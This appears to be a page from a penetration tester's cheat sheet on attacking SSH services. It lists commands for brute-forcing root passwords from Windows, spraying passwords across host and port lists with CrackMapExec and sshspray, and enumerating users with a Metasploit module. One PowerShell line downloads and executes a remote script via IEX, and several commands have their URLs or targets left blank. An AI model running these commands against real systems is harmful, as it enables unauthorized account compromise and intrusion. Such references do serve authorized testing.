Secure Shell

Brute Force

From Windows:
PS > curl -o plink.exe
PS > IEX(New-Object Net.WebClient).DownloadString("")
PS > ssh-putty-brute -h -p 22 -u root -pw 'Passw0rd!'
PS > ssh-putty-brute -h -p 22 -u root -pw (gc .\passwords.txt)

Password Spray

A list of targets with different SSH ports:
$ das parse ssh -raw | cut -c 7- | awk -F: '{print $1}' > ssh_hosts
$ das parse ssh -raw | cut -c 7- | awk -F: '{print $2}' > ssh_ports
$ paste ssh_hosts ssh_ports | while read host port; do cme ssh $host -u root -p root --port $port; done
Password spray with a private key and passphrase Passw0rd! using CME:
$ cme ssh -u snovvcrash -p 'Passw0rd!' --key-file id_rsa
Using sshspray:
$ python3 -u snovvcrash -i ~/.ssh/id_rsa -t ssh.txt

Enum Users

msf > use auxiliary/scanner/ssh/ssh_enumusers
msf > set CHECK_FALSE true
msf > set RHOSTS file:ssh.txt
msf > set THREADS 25
msf > set USERNAME root
msf > run
Last modified 1mo ago